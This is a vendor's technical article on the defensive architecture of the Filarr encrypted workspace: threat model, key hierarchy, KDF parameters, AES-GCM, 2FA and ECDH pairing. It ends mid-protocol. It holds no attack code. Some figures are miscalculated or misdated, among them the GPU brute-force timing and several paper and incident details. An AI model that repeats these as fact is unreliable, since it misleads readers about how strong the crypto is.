Filarr security, layer by layer — the exhaustive defensive architecture
Threat model, cryptography, Electron hardening, comparisons with Signal / 1Password / Obsidian, real-world CVE walk-throughs. The complete guide to everything protecting your data — including from the servers hosting it.
Mathis Belouar-Pruvot
Quick Answer. Filarr protects your data with AES-256-GCM per-file encryption, a KEK/FEK key hierarchy derived from your password via PBKDF2-SHA-512 (600,000 iterations) and Argon2id, optional TOTP two-factor authentication, and zero-knowledge cloud sync where servers only see opaque encrypted blobs. Electron is hardened with full fuses, contextIsolation, sandboxing, and a strict CSP. Independently audited.
Update v2.3.1 (April 18, 2026): this article reflects the state of the code after the full security audit shipped in v2.2.1, the v2.2.2 crypto hardening (full Electron fuses + HKDF on pairing), and the v2.3.0 Electron 41 upgrade that fixed 18 CVEs accumulated in the 39 branch.
Filarr is a local-first encrypted workspace with zero-knowledge cloud sync. In practice, this means that your data never leaves your machine in cleartext, even when synced with the cloud: Filarr's servers only see opaque encrypted blobs they cannot decrypt, even under legal compulsion or infrastructure compromise. This promise isn't a marketing slogan — it's the mathematical consequence of an architecture where encryption keys never leave your device without first being encrypted by an ephemeral key the server cannot reconstruct.
The article below describes every security mechanism in place, with exact parameters, exact files, exact CVEs fixed, comparisons with other tools in the market, and technical references (NIST, RFCs, OWASP, academic papers) for every decision. No vague "military-grade", no artistic handwaving: if you want to audit the code, every choice is documented and traceable.
If you only have ten minutes, the summary section covers the essentials. Otherwise, settle in comfortably — defense in depth takes a while to unpack.
Table of contents
- Threat model: who we defy, with what capabilities
- Zero-knowledge: what it actually means
- The key hierarchy: Password → KEK → FEK
- Argon2id and PBKDF2 — why Filarr uses both
- AES-256-GCM: choice, strengths, deadly pitfalls
- Two-factor authentication (2FA): TOTP, backup codes, what it actually protects
- Multi-device pairing: ECDH and HKDF under the hood
- Electron hardening — one app, three isolations
- Content Security Policy — what it actually blocks
- XSS sanitization: DOMPurify and known traps
- Anatomy of a kill chain: XSS → RCE (before/after v2.2.1)
- Supply chain: lessons from event-stream, ua-parser-js, node-ipc
- CVE history
- Comparison with other tools
- Security roadmap
- Summary
- References and further reading
1. Threat model
A threat model is only useful if it's honest about its limits. Announcing "Filarr is safe against all attackers" is a lie by omission. The real question is: which adversaries does Filarr defend you against, with what capabilities, and at what threshold do those defenses break. This section answers these three questions explicitly.
1.1 What we aim to protect
The surface to protect splits into four categories. The first, obvious, is user content: notes, files, associated metadata — folder names, tags, hierarchical structure, modification timestamps. The second is the group of encryption keys: the FEK (File Encryption Key) that encrypts everything else, the KEK (Key Encryption Key) derived from your password, and the ephemeral keys generated during multi-device pairing. The third is the integrity of the Electron binary itself: we want to guarantee that no attacker can run arbitrary code in the Filarr process, whether via command-line argument injection, patching the app.asar file on disk, or compromising an npm dependency. The fourth, finally, is availability: the app must not be usable as a denial-of-service vector (no ransomware via imported ZIP bomb, no reproducible crash from adversarial input).
These four categories are not treated uniformly. Content and keys benefit from strong cryptographic protection — an attacker reading the encrypted blobs can do nothing with them. Binary integrity rests on more subtle mechanisms (Electron fuses, ASAR validation, CSP) detailed in section 8. Availability is treated as a classic robustness objective: size caps, depth limits, strict validation.
1.2 Adversary profiles considered
Drawing on the STRIDE classification and the MITRE ATT&CK framework, we distinguish seven adversary profiles, each with its own capabilities and the defenses specific to it:
| Adversary | Capabilities | MITRE Tactic | Main defense |
|---|---|---|---|
| Compromised Filarr server (RCE, insider, subpoena) | Reads all blobs, forges API responses | T1565 (Data Manipulation) | Client-side zero-knowledge — technical impossibility of decryption |
| Network MitM (public café, hostile ISP, state actor) | Intercepts traffic, forges TLS responses | T1557 (Adversary-in-the-Middle) | TLS 1.3 + HSTS + implicit pinning (fixed endpoint) + strict new URL() validation |
| User-level local malware (trojan in a downloaded .exe) | Reads home directory, observes timing, injects env vars | T1059 (Command and Scripting Interpreter), T1055 (Process Injection) | Electron fuses (RunAsNode: false, EnableNodeOptionsEnvironmentVariable: false), constant-time comparisons, IPC allowlist |
| Renderer XSS (booby-trapped note, hostile Obsidian import) | Executes JS in the app with renderer privileges | T1189 (Drive-by Compromise) | contextIsolation: true, sandbox: true, strict IPC allowlist, defensive DOMPurify with widened FORBID_TAGS |
| npm supply chain (dependency corrupted via account takeover) | Injects code into a package we load | T1195.002 (Compromise Software Supply Chain) | Quarterly npm audit, restrictive CSP, fuses, ASAR integrity validation |
| Offline physical access (stolen laptop) | Full disk access without active session | T1005 (Data from Local System) | FEK sealed in OS keychain (DPAPI/Keychain/libsecret), Enhanced Lock mode wipes .fek_safe on close |
| Cloud provider (Cloudflare, R2) | Reads all bucket objects | T1530 (Data from Cloud Storage) | Objects encrypted client-side — the FEK never exists on R2, even temporarily |
Each row corresponds to a distinct attack surface with its own chain of mitigations. We can defend against a compromised server (client-side encryption) but not against a local root (which can dump RAM); we can block renderer XSS (contextIsolation + sandbox) but can't prevent a user from choosing password123. Defense in depth means covering each row with independent layers so that a single break doesn't compromise everything.
1.3 What we don't claim to protect against
For intellectual honesty, several attack classes are explicitly out of scope. Stating them clearly avoids misunderstandings: Filarr isn't designed for these use cases, and an exposed user should use other tools.
First, an attacker with root, admin, or SYSTEM privileges on your machine can bypass all software defenses. They can dump the Filarr process memory (reading the FEK in cleartext while it's in RAM), directly patch the binary to disable checks, install a keylogger that captures your password before you even type it into the app. No user-space software resists an attacker who has the same privileges as the operating system: OS-level defense (Windows Defender on Windows, SELinux/AppArmor on Linux, XProtect and Gatekeeper on macOS) is where to defend. Filarr doesn't pretend to replace these layers.
Next, a trivial password renders any cryptography useless. If your password is password2024, no 600,000-iteration key derivation saves you from a targeted GPU bruteforce. With 8 modern RTX 4090 GPUs, SHA-512 runs at about 20 gigahashes per second (Hashcat benchmarks 2024), enough to test a 10^10 common-word dictionary in a few hours. PBKDF2 multiplies this time by 600,000, bringing the attack back to a few weeks rather than a few seconds — still within reach of a motivated adversary with a weak password. You're the weakest link, not the crypto.
Third, Filarr is not designed to resist a nation-state with firmware access. If your adversary can install an implant at the BIOS level, Intel Management Engine, or hard drive firmware, you're lost regardless of application-level encryption quality. For this threat model — journalists under authoritarian dictatorships, political dissidents, whistleblowers — the appropriate tools are Qubes OS for compartmentalized isolation, Tails for ephemeral trace-free use, and Signal for communication. Filarr is a productivity tool with strong encryption for privacy-conscious mainstream users, not a state-device circumvention tool.
Finally, and this is probably the most important point for the average user: if you forget your password AND your recovery phrase, your data is permanently lost. It's the unavoidable cost of zero-knowledge. There's no hidden "administrator password" a support team could use to rescue you, because if it existed, it would exist for anyone who compromises Filarr too. This asymmetry is the price to pay so that no one — not even us — can read your data without your explicit consent.
2. Zero-knowledge
The term "zero-knowledge" has become a diluted marketing buzzword that has lost its meaning. In formal cryptography, a zero-knowledge proof refers to a very precise protocol where a prover convinces a verifier of the truth of a fact without revealing anything else. zk-SNARK protocols used by Zcash or Ethereum rollups are examples. Filarr implements nothing of the sort — claiming otherwise would be a misuse of the term.
What Filarr implements is what's more precisely called zero-knowledge storage or end-to-end encryption at rest, in the sense used by Bitwarden, ProtonDrive, Tresorit or 1Password: the server receives data, stores it, retransmits it, but has no means of decrypting it. This property is ensured not by a sophisticated cryptographic proof but by a strict architectural invariant: encryption keys never transit through the server in cleartext.
To make this promise concrete, imagine a Filarr server receiving a user note containing the text "I am David". What the server literally sees is a byte sequence of the form:
[4 bytes FEK marker]
[12 bytes random nonce]
2f 8a c3 d1 7e ... (ciphertext ~98 bytes)
[16 bytes authentication tag]
This sequence is indistinguishable from a random sequence of the same size to anyone without the FEK. That's a formal property called IND-CCA2 (indistinguishability under adaptive chosen-ciphertext attack), proven for AES-GCM by Bellare and Namprempre in 2008. In other words, even if an attacker can submit arbitrary ciphertexts to the server and observe responses, they cannot deduce from observing the blobs any information about their content — not the exact size (modulo padding), not the language, not the presence of repeating patterns. The ciphertext is as informative as a stream of random data.
For this property to hold, the architecture imposes an absolute red line: the server must never touch the FEK in cleartext, at any time, in any form. This line materializes in several practical prohibitions. There IS a copy of your master key stored server-side — it's needed so you can log in from a new device without manually pairing it with another, already-unlocked one — but that copy is encrypted by a key derived from your password via PBKDF2-SHA-512 with 600,000 iterations, and the server never sees your password. Without that password, the encrypted copy is an inert blob: it therefore does not let Filarr decrypt your files, nor let us recover your account if you lose your password. This is exactly the same model as Bitwarden's ProtectedSymmetricKey and ProtonMail's encrypted private keys: the server-side copy exists to enable multi-device, not to bypass the crypto. There's no "administrator master key" that would decrypt all accounts when needed, because such a key would immediately be a prime target for an attacker compromising the server. No key derivation is performed server-side, not even intermediate: the entire cryptographic chain from password to FEK takes place in the browser or Electron main process. And finally, when the FEK must transit to a new device via direct pairing (both devices together, without going through the password), the FEK is encrypted by an ephemeral key derived via ECDH between the two devices, whose private parts the server has never seen — it only sees an already-encrypted blob it cannot open (see §7).
This architectural discipline is the same as that of Signal, 1Password, Bitwarden, ProtonMail, and Tresorit. It works under one necessary condition: the client code must be honest. If the client secretly sent the FEK to the server in a custom HTTP header, the entire construction would collapse. That's precisely why source code transparency matters, and why the "trust but verify" approach — code is public, mechanisms are documented, external audit is planned — is the backbone of trust rather than any marketing discourse.
3. The key hierarchy
At Filarr's heart is a classic but rigorously applied two-level cryptographic architecture: a random master key that encrypts all user data, and a password-derived key that encrypts the master key. This separation isn't a detail — it enables several critical features we'll detail, and it's the standard pattern adopted by all serious modern encryption tools.
3.1 The FEK, root key encrypting all content
The File Encryption Key, abbreviated FEK, is a symmetric 256-bit key generated locally the first time you create a profile. It's produced by a call to crypto.getRandomValues(), which guarantees a CSPRNG (cryptographically secure pseudo-random number generator) source of OS-level quality: on Windows it's CryptGenRandom fed by RtlGenRandom and modern hardware entropy sources; on Linux it's /dev/urandom fed by kernel entropy accumulated since boot; on recent macOS it's CCRandomGenerateBytes based on the OS Fortuna generator. The quality of this source is fundamental — a predictable FEK would compromise everything — which is why we never generate it via Math.random() or other functions that aren't explicitly cryptographic.
This single 256-bit key is used to encrypt absolutely all user content: every file individually (with a unique nonce per file to avoid any collision), every note taken in the editor, all associated metadata — folder names, hierarchical notebook structure, tags associated with notes, creation and modification dates — and finally the cloud sync manifest, that special file listing all blobs present on R2 with their identifiers and versions. This manifest is itself encrypted so as not to reveal to the server the structure of your vault (even if we don't see file contents, knowing you have precisely 47 notes with such a link graph would already be an information leak).
The inviolable rule around the FEK is that it must never leave the device in cleartext. Not in an error log file, not in any API request payload, not in an automatic backup to a third-party service, not in an exception message shown to the user. The FEK can, however, leave a device in two circumstances, each time in encrypted form. During cloud sync, it leaves wrapped by your KEK (itself derived from your password) — the server never sees your password and therefore cannot unwrap it, as detailed in §2. During direct multi-device pairing, it's encrypted by an ephemeral key derived via Diffie-Hellman between the two devices involved — a key that neither the Filarr server nor any third party can reconstruct. Protocol details are in section 7.
3.2 Why not encrypt directly with the password?
An attentive reader might ask why not simply derive a key from the password and encrypt files directly with it. The answer boils down to one phrase: password change UX. If we encrypted files with a key derived directly from the password, changing the password would mean re-encrypting every file with the new key. For a 50 GB vault containing 10,000 files, this operation would take hours, saturate the disk, and break at any interruption — a functional nightmare that would deter any user from ever changing their password.
The standard pattern, used by 1Password, Bitwarden, Keeper, LastPass, Signal, and every serious tool, therefore separates two keys with distinct roles. The KEK (Key Encryption Key) is derived from the password via an expensive key derivation function; it changes whenever the password changes. The FEK is random, generated once at profile creation, and encrypted ("wrapped") by the KEK in a wrapped_fek.json file stored locally — and, for cloud accounts, mirrored server-side in that same encrypted form so you can log back in from a new device without going through a direct pairing. Changing the password therefore simply means deriving a new KEK, re-wrapping the FEK with it, writing the new wrapped_fek.json locally and pushing it to the server — an operation taking milliseconds and touching zero encrypted files.
This design offers an unexpected but essential bonus: it allows multiple KEKs to protect the same FEK. This is exactly what Filarr does for the recovery key: when you export your recovery key, we derive an alternative KEK from a password you choose specifically for this export (distinct from the main vault password), we wrap the same FEK with this alternative KEK, and we store the result in a JSON file you archive offline. If you lose your vault password, you can restore access to all your data via this recovery file — provided of course you haven't also lost the export password.
3.3 Unlocked FEK persistence via the OS keychain
Once you've entered your password at launch, the KEK is derived, the FEK is unwrapped, and the FEK is in RAM. Re-requesting the password at each launch would be unbearable in practice — no user accepts that durably. The standard solution, widely adopted by modern desktop apps, is to persist the unlocked FEK in the operating system keychain, which encrypts the FEK with a key derived from your active user session.
On Windows 10 and above, we use the DPAPI (Data Protection API) exposed by Electron as safeStorage.encryptString(). DPAPI encrypts data with a key derived from a mixture of your Windows session hash, machine-specific entropy (non-exportable), and user-specific entropy. Result: the encrypted file is unreadable from another user account on the same machine, unreadable if copied to another machine, and unreadable if your Windows session is closed.
On macOS, the same Electron API hooks into Keychain Services. The system keychain is itself unlocked by your session password or Touch ID; its master key is sealed in the Secure Enclave on recent Macs, making it resistant even to an attacker with physical access to the machine.
On Linux, the abstraction goes through libsecret, which can rely on gnome-keyring or kwallet depending on the desktop environment. The key is derived at login, and the daemon keeps it in RAM until logout. On minimal distributions without a keychain daemon, the API can return "encryption not available".
The resulting file, named .fek_safe and stored in the Filarr profile folder, is therefore unreadable even by yourself outside an active session. On top of that, we apply Unix permissions 0o600 (read-write for owner only) on all platforms, which also blocks access from other non-privileged processes running under the same user.
An important behavior change was introduced in v2.2.1 regarding the case where the keychain is unavailable: previously, hybrid:storeFEK silently returned false without persisting the FEK. This design left the door open for a future developer, wanting to "simplify life for Linux users without a keychain", to inadvertently add a cleartext fallback. Now the call throws an explicit error that surfaces to the user: "OS keychain unavailable, vault password required at each launch". It's less pleasant UX-wise, but it's the right choice — no implicit fallback that could one day degrade into "we write the FEK in cleartext so it works anyway". The underlying principle is fail-closed rather than fail-open: when in doubt, refuse, don't improvise.
3.4 Enhanced Lock and auto-lock
For users whose threat model is more demanding, Filarr provides two complementary mechanisms that reduce the window during which the FEK is accessible in memory.
Enhanced Lock mode, once activated, deletes the .fek_safe file on every app close. Concretely, the FEK no longer persists between sessions: each launch requires retyping the vault password. It's the mode to favor if you physically share your machine with others, if you travel with a laptop that could be seized at a border, or simply if you prefer to accept the UX cost of a password at each launch in exchange for a reduced attack surface.
Auto-lock, configurable at 5, 15, 30 or 60 minutes of inactivity, acts during sessions. After the chosen delay without user interaction, Filarr overwrites the FEK in renderer memory (filling the Uint8Array with zeros, removing references), displays the lock screen, and requires PIN entry (or full password depending on config). An attacker accessing your machine during your coffee break would no longer find the FEK in the Electron process memory — or at least not in the JavaScript references managed by the garbage collector.
On this last point, mandatory intellectual honesty: in JavaScript, "wiping memory" doesn't have the strict guarantee you get in Rust or C with functions like memset_s. The V8 engine may have already copied the FEK during its internal optimizations (inlining, young-to-old space promotions), and the garbage collector doesn't immediately zero these copies. For a forensic-level adversary capable of dumping RAM in real time with a tool like Volatility or directly via a DMA attack over Thunderbolt, there's still a window where FEK fragments can be recovered. It's an intrinsic limitation of the JavaScript runtime, not an implementation choice. For a classic user-level malware adversary or a curious colleague who sits at your keyboard, the protection is effective.
4. Argon2id and PBKDF2
All at-rest encryption security depends, ultimately, on the quality of the key derivation function (KDF) that transforms your password into a cryptographic key. A 10-character password has at most about 40 to 50 bits of entropy in the best case — largely insufficient to resist direct bruteforce. The KDF's role is to slow each derivation attempt to the point of making bruteforce economically prohibitive for an attacker, while keeping latency acceptable for the legitimate user who derives one key per launch.
Filarr uses two different KDFs depending on execution context, and it's a conscious decision worth explaining because it can surprise.
4.1 Why two KDFs?
On the Node.js main process side, where all native libraries are available, we use Argon2id via the node-argon2 package. It's the KDF of choice in 2026, winner of the Password Hashing Competition in 2015 and standardized by RFC 9106 in 2021.
On the renderer side (embedded Chromium browser), we don't have access to Argon2. The reason is unpleasant but real: the Web Crypto API exposed by browsers still doesn't support Argon2 in 2026, despite an open W3C debate since 2019. Successive addition proposals (CryptoKey.derivedKey with "Argon2" as algo name) never succeeded, mainly because native browser implementations were deemed too costly to maintain uniformly. So we're forced to fall back on PBKDF2-SHA-512 as an acceptable modern alternative.
This hybridization isn't ideal — we'd prefer to use Argon2id everywhere — but it reflects the platform's real constraint. The alternative would be to compile a WASM implementation of Argon2 and load it in the renderer, but this would introduce loading overhead (~100-200 KB of WASM), a third-party dependency to maintain, and complications in validating the WASM binary's integrity. We judged the hybrid solution a better compromise, at least until the Web Crypto API standardizes Argon2.
4.2 Argon2id parameters and why these values
When we use Argon2id in the main process, the configuration is:
const ARGON2_OPTIONS = {
type: argon2.argon2id,
memoryCost: 65536, // 64 MB RAM per hash
timeCost: 3, // 3 passes
parallelism: 4, // 4 threads
hashLength: 32, // 256-bit output
};
These values exactly match the 2024 OWASP Password Storage Cheat Sheet recommendation for Argon2id. They result from calibration balancing three objectives: being costly enough to discourage an attacker, being fast enough not to frustrate the user, and being RAM-frugal enough to run on entry-level machines.
Why the Argon2id variant rather than Argon2d or Argon2i? The three variants defined by the standard only differ in their behavior against side-channel and GPU attacks. Argon2d is the most GPU-resistant but vulnerable to side-channel attacks: its memory access pattern depends on secret data, allowing an attacker observing the cache hierarchy (for example via Flush+Reload on a shared server) to deduce password bits. Argon2i is designed to be side-channel-resistant (data-independent memory access) but loses GPU resistance. Argon2id is the hybrid variant using Argon2i during the first pass (when the password is processed and side-channels are most dangerous) and Argon2d during subsequent passes (when data is already mixed and GPU resistance matters). It's the default recommendation since RFC 9106 for any general use.
The choice of 64 MB of memory per hash is the core of anti-GPU defense. A modern GPU like an RTX 4090 has about 16,000 compute cores and 24 GB of VRAM. It can efficiently parallelize SHA-256 operations where each thread only needs a few kilobytes. But Argon2id with 64 MB per hash means we can only have 24/0.064 ≈ 375 parallel hashes per GPU, versus millions for SHA-256 alone. Parallelization collapses, and cost per hash explodes. This is what's called a memory-hard function: designed to make parallel attack economically prohibitive rather than just slow.
4.3 PBKDF2-SHA-512 parameters
When Argon2 isn't available (renderer side), we use PBKDF2 with this configuration:
{
name: 'PBKDF2',
salt, // 16 random bytes per user
iterations: 600000,
hash: 'SHA-512',
}
600,000 iterations with SHA-512 represents twice the OWASP 2024 recommendation (which is 300,000 for SHA-512). Why double? Simply because the cost is invisible to the user (about 500 ms on an average laptop) and margin over recommendations gives some breathing room against GPU progress in coming years.
The choice of SHA-512 rather than SHA-256 deserves explanation. Both SHA variants have equivalent cryptographic properties, but SHA-512 processes 1024-bit blocks at each iteration (vs 512 for SHA-256). On a modern 64-bit CPU, SHA-512 is actually faster per byte processed than SHA-256, because it natively operates on 64-bit registers. But on a GPU, this advantage partially reverses: GPUs are optimized for 32-bit operations, and SHA-512 forces them to simulate 64-bit operations, introducing overhead. The empirically measured result (Blackhat 2015) is that the GPU gain ratio on SHA-512 is about 2×, versus 10× for SHA-256. In other words, each PBKDF2-SHA-512 iteration is approximately 5× more resistant to GPU attack than PBKDF2-SHA-256 at equal iteration count. Not huge, but free.
A related choice we've sometimes been asked about is why not 1 million or 2 million iterations rather than 600,000. The answer is a UX question: on a tired i5 laptop from 2018, 600,000 iterations takes about 500 ms. Beyond that, the user visibly perceives a wait at each unlock, and accumulated friction discourages regular app use. Real security gain comes from Argon2id (memory-hard) rather than pushing PBKDF2 to astronomical numbers that only linearize a problem GPUs linearize equally well.
4.4 The salt, always unique, always random
Last derivation element: the salt. Filarr uses a 16-byte (128-bit) salt generated randomly by crypto.getRandomValues() for each user, stored alongside the hash. Never derived from username, never constant between users, never derived from email. Two classic reasons justify this discipline.
The first is that random salt makes rainbow tables useless — those huge attacker precomputations that map common passwords to their hashes. With a different salt per user, a rainbow table valid for user Alice isn't reusable for user Bob, even if both chose the same password.
The second is anti-replication between users: if Alice and Bob both choose the password hunter2 (a classic), their derived hashes will be totally different thanks to the random salt. An attacker compromising a database cannot detect this collision — which would be very valuable information, as it would let them deduce that if one of the two passwords is cracked, the other is too.
4.5 Comparison with other tools
To place Filarr in the ecosystem, here are the KDF choices of some known tools:
| Tool | KDF | Parameters | Comment |
|---|---|---|---|
| Filarr (v2.3) | PBKDF2-SHA-512 (renderer) + Argon2id (main) | 600k iter / m=64MB t=3 p=4 | Web Crypto has no Argon2 — forced mix |
| Bitwarden | PBKDF2-SHA-256 | 600k iter (2023 default) | Argon2id migration ongoing |
| 1Password | PBKDF2-SHA-256 + Secret Key | 650k iter | The Secret Key (256-bit stored separately) doubles security |
| Signal | HKDF-SHA-256 (not strictly a password KDF) | N/A | Signal has no user password — everything derives from PIN + Secure Value Recovery |
| KeePassXC | Argon2id (or legacy AES-KDF) | Configurable | State of the art desktop |
| LastPass | PBKDF2-SHA-256 | 100k iter (scandalous in 2024 — see 2022 incident) | Avoid |
Filarr sits at the top of the table thanks to Argon2id on the main process side and doubled PBKDF2 iterations on the renderer side. The only tool with fundamentally stronger defense is 1Password, thanks to their Secret Key — a 256-bit key the user stores off-server (on a printed QR code, for example) that combines with the password to derive the final KEK. We considered this model for Filarr but the UX degradation (must handle an additional file alongside the password at each new device) was deemed incompatible with the tool's mainstream target.
5. AES-256-GCM
Each file and note in Filarr is encrypted individually — no inter-file chaining — with AES-256 in GCM mode (Galois/Counter Mode), standardized by NIST SP 800-38D in 2007. This choice isn't debated in the modern cryptographic community, but it deserves explanation of why it's this one rather than another mode and what traps to avoid when using it.
5.1 Exact ciphertext structure
On disk, an encrypted file has the following structure:
[4 bytes FEK marker = 0x46 0x45 0x4B 0x01] # identifies format v1
[12 bytes random nonce] # unique per encryption
[variable-length ciphertext]
[16 bytes GCM authentication tag]
The 4-byte marker is a format field that lets Filarr handle backward compatibility with profiles migrated from v1.x (where encryption used a local key rather than the FEK). Decryption reads the first 4 bytes, recognizes the format, and routes to the right code path. It's defensive cryptographic versioning — the day we migrate to another algorithm (for example adding post-quantum Kyber), this same mechanism will handle mixed formats during transition.
The 12 bytes of nonce are public and stored in cleartext alongside the ciphertext. That's normal and safe in GCM, as we'll detail below. The ciphertext proper is exactly plaintext size (GCM is a "streaming" mode without padding), and the last 16 bytes are the authentication tag that will let decryption detect any modification.
5.2 Why GCM rather than CBC, CTR or ChaCha20?
The landscape of symmetric encryption modes is more nuanced than it appears. Here are the main candidates and their trade-offs:
| Mode | Confidentiality | Integrity | Perf | Side-channel | Verdict |
|---|---|---|---|---|---|
| AES-ECB | ❌ (pattern leak) | ❌ | Fast | Resistant | Banned |
| AES-CBC | ✅ | ❌ (not authenticated) | Medium | Padding oracle risk | Avoid alone |
| AES-CBC + HMAC | ✅ | ✅ | Slow (2 passes) | OK | OK but complex |
| AES-CTR | ✅ | ❌ | Fast | OK | Avoid alone |
| AES-GCM | ✅ | ✅ (AEAD) | Fast (hw accel) | Good (except nonce reuse) | Modern standard |
| ChaCha20-Poly1305 | ✅ | ✅ (AEAD) | Fast (soft) | Very good | Alternative if no AES-NI |
AES-GCM is the modern default choice for three combined reasons. First, it combines encryption and authentication in a single construction (AEAD, Authenticated Encryption with Associated Data): the 16-byte tag detects any ciphertext modification with collision probability 2^-128. So we don't have to manually combine encryption (CBC) with a MAC (HMAC), a construction that has historically ended badly in naive implementations (see Encrypt-then-MAC vs MAC-then-Encrypt vs Encrypt-and-MAC and TLS 1.0's disasters with the wrong choice).
Next, AES-GCM benefits from AES-NI hardware acceleration present on all x86-64 CPUs since ~2010 (Intel) and all ARM64 with Cryptography extensions since ARMv8. A modern core reaches about 5 gigabytes per second in AES-GCM, making encryption cost negligible compared to I/O cost in practice. The ChaCha20-Poly1305 alternative is also very fast but in pure software; it becomes preferable on AES-NI-less platforms (low-end ARM mobile, for example), but for a desktop Electron app, AES-GCM is optimal.
Finally, AES-GCM is a FIPS 140-2 standard, natively supported everywhere: Web Crypto API, Node.js crypto, OpenSSL, libsodium, BoringSSL. It's used by TLS 1.3 as the default cipher suite, by Signal to encrypt messages, by Age to encrypt files, by AWS for KMS. It's the field consensus.
5.3 The deadly trap: Forbidden Attack and nonce reuse
AES-GCM has a catastrophic weakness you must know: reusing a nonce with the same key completely destroys security. Not "a bit dangerous" in the sense of losing a few security bits — total, allowing an attacker not only to decrypt but also to forge arbitrary ciphertexts that will pass verification.
Technically, if an attacker observes two ciphertexts C1 and C2 encrypted with the same (K, N) pair, they can first compute C1 ⊕ C2 = P1 ⊕ P2, revealing the linear combination of plaintexts. Then, by solving the polynomial system over the Galois field GF(2^128) underlying GCM, they can recover the internal authentication key H = AES_K(0^128). With H in hand, the attacker can compute the GCM tag of any ciphertext they construct, and thus forge arbitrary authenticated ciphertexts. This attack, described by Böck, Zauner and Devlin in their 2016 paper Nonce-Disrespecting Adversaries, was exploited in practice against approximately 70,000 misconfigured HTTPS servers the same year.
Filarr protects against this attack class through strict discipline: at each encryption, we call crypto.getRandomValues(new Uint8Array(12)) to produce 12 nonce bytes from a CSPRNG source. With 2^96 possible nonces and n files encrypted under the same FEK, collision probability follows the birthday paradox: about n² / 2^97. For a user to encrypt 2^32 files (four billion), collision probability is on the order of 2^-33 — negligible. In practice, an average user encrypts at most 2^20 files over the lifetime of their profile, giving collision probability of 2^-57: unreachable.
We never generate the nonce via a counter incremented and persisted, even though it's theoretically more random-frugal. The reason: a crash between increment and counter writing could cause nonce reuse at restart, which is precisely the catastrophic scenario. Cryptographic randomness at each encryption is slightly more CPU-costly but eliminates this bug class by construction.
5.4 The nonce is public, and that's intentional
A frequent confusion concerns the nature of the nonce: many people consider it an additional secret, by analogy with the key. Wrong. In GCM, the nonce isn't a secret; it fills the IV (initialization vector) role and is public by design. It's stored in cleartext alongside the ciphertext and transmitted with it. Only its reuse with the same key is forbidden — it's not nonce confidentiality that matters, it's uniqueness.
5.5 What exactly does the GCM tag authenticate?
The 16-byte tag at the end of the ciphertext simultaneously authenticates three things. First the ciphertext itself: any modification, even of a single bit, invalidates the tag and decryption fails. Next the associated data (AAD, Additional Authenticated Data) if provided — Filarr doesn't use it but the API field exists, and it could serve to bind a ciphertext to public metadata (for example the cleartext file identifier), preventing an attacker from swapping it between files. Finally, implicitly, the nonce and key: a tag computed with a different (K, N) pair won't verify, so an attacker trying to decrypt with the wrong key gets an error rather than silently corrupted plaintext.
An important API detail: when crypto.subtle.decrypt() detects an invalid tag, it throws an exception rather than returning partial plaintext. This is the formal definition of AEAD — never any return of unauthenticated data, ever. An attacker trying to modify the ciphertext to obtain even a small fragment of plaintext runs into this absolute Web Crypto guarantee.
6. Two-factor authentication (2FA)
Client-side encryption protects your files against a compromised server, but it does not protect your account against an online takeover. An attacker who guesses your password through credential stuffing can log in, exfiltrate server-visible metadata and trigger vault deletion. IP-based rate limiting alone is not enough: a botnet rotating 5,000 residential IPs flies under the radar. As of April 2026, Filarr therefore offers TOTP-based two-factor authentication, opt-in, enabled from Settings > Security (free accounts included).
6.1 Why TOTP RFC 6238
Filarr uses standard TOTP RFC 6238: SHA-1, 6 digits, 30s period, ±1 step tolerance window. This is a deliberate choice over WebAuthn / Passkeys. WebAuthn offers better anti-phishing protection but requires compatible hardware (Touch ID, YubiKey, Windows Hello) and uneven portability across devices and browsers. TOTP works everywhere with any standard authenticator — Authy, Google Authenticator, 1Password, Bitwarden, and dozens more — with nothing server-side beyond a base32 secret and an RFC-compliant verifier. This portability is coherent with the model "your password remains the cryptographic source of truth": 2FA complements server-side auth, it does not replace local crypto.
6.2 Backup codes, hashed as HMAC-SHA-256
At activation, Filarr generates 8 single-use backup codes. Each code is stored as an HMAC-SHA-256 digest; the HMAC key derives from the worker's JWT_SECRET, which never lives in D1. Using HMAC instead of bcrypt is not a security compromise: with 40 bits of random entropy per code, an attacker who exfiltrates D1 also has to compromise the separately-stored JWT_SECRET; and even with both, brute-forcing HMAC-SHA-256 over 40 bits of uniform randomness remains expensive. Bcrypt cost 12 (≈250 ms per attempt) is simply not viable on a Cloudflare Worker's 50 ms CPU budget — with native HMAC in Web Crypto, verification takes microseconds and operational cost is zero.
6.3 What 2FA does NOT protect
Important: 2FA protects only the account login. It interposes a barrier at sign-in via a two-step flow: password → short 5-minute MFA token → TOTP code or backup code → session tokens, with a 10 attempts / 15 min / IP rate limit on the second step. But if an attacker exfiltrates the encrypted copy of your master key stored server-side, they can attempt an offline brute-force — and there, 2FA does nothing at all. Only the strength of your password and the 600,000 PBKDF2-SHA-512 iterations do the work. 2FA is an anti-takeover defense distinct from the crypto defense; the two are complementary, not substitutes.
Recovery-phrase regeneration (24-word BIP-39) and backup-code regeneration are also available from Settings > Security — both invalidate the previous artifacts immediately.
7. Multi-device pairing
FEK sharing between multiple devices is probably the cryptographically trickiest part of the entire architecture. The constraint is clear: we want a user who has already unlocked their account on their laptop (Device A) to be able to add their smartphone or a second laptop (Device B) to the same account, with access to all data, without the server ever seeing the FEK in cleartext. How to transmit a secret key through an untrusted channel (the server) without the channel being able to read it? That's precisely the problem Diffie-Hellman key exchanges have solved since 1976, with solid mathematical guarantee.
7.1 The full protocol in v2.2.2+
The basic idea of a Diffie-Hellman exchange is that two parties can derive a shared secret by exchanging public keys over an open channel, without a passive observer being able to reconstitute this secret. In modern cryptography, we use the elliptic curve variant (ECDH) which offers the same security as classical Diffie-Hellman with much shorter keys: an ECDH key on the P-256 curve is 256 bits, versus about 3072 bits for equivalent security with modular Diffie-Hellman.
Here's the full Filarr protocol:
┌─────────────────────────────┬─────────────────────────────┐
│ DEVICE A │ DEVICE B │
├─────────────────────────────┼─────────────────────────────┤
│ 1. Generate (privA, pubA) │ │
│ ECDH P-256 │ │
│ 2. Generate 6-digit code │ │
│ via crypto.randomInt() │ │
│ 3. PUT /pairing/<code> { │ │
│ pubA: base64 │ │
│ } (TTL 5 min) │ │
│ │ 4. User enters code │
│ │ 5. GET /pairing/<code> │
│ │ → receives pubA │
│ │ 6. Generate (privB, pubB) │
│ │ 7. sharedBits = │
│ │ ECDH(privB, pubA) │
│ │ 8. wrapKey = │
│ │ HKDF-SHA-256( │
│ │ ikm=sharedBits, │
│ │ salt=code, │
│ │ info="filarr. │
│ │ pairing.wrap.v1", │
│ │ length=32 │
│ │ ) │
│ │ 9. PUT /pairing/<code>/ │
│ │ device-b-pubkey { │
